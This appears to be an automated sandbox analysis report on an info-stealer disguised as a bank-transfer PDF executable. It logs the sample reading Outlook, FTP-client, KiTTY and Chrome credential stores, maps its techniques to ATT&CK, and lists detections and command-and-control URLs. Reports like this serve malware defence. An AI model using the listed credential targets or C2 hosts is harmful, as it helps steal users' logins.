                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: Yara matchFile source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management InstrumentationPath Interception111
                  Process Injection
                  11
                  Masquerading
                  2
                  OS Credential Dumping
                  11
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools
                  1
                  Credentials in Registry
                  21
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  Exfiltration Over Bluetooth2
                  Non-Application Layer Protocol
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Remote System Discovery
                  SMB/Windows Admin Shares2
                  Data from Local System
                  Automated Exfiltration112
                  Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                  Process Injection
                  NTDS13
                  System Information Discovery
                  Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                  Obfuscated Files or Information
                  LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common13
                  Software Packing
                  Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Timestomp
                  DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  transferencia bancaria.pdf.exe12%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  transferencia bancaria.pdf.exe21%VirustotalBrowse
                  transferencia bancaria.pdf.exe100%Joe Sandbox ML
                  No Antivirus matches
                  SourceDetectionScannerLabelLinkDownload
                  1.0.transferencia bancaria.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  0.2.transferencia bancaria.pdf.exe.442b890.12.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  SourceDetectionScannerLabelLink
                  sempersim.su21%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://alphastand.top/alien/fre.php0%URL Reputationsafe
                  http://alphastand.top/alien/fre.php0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://alphastand.win/alien/fre.php0%URL Reputationsafe
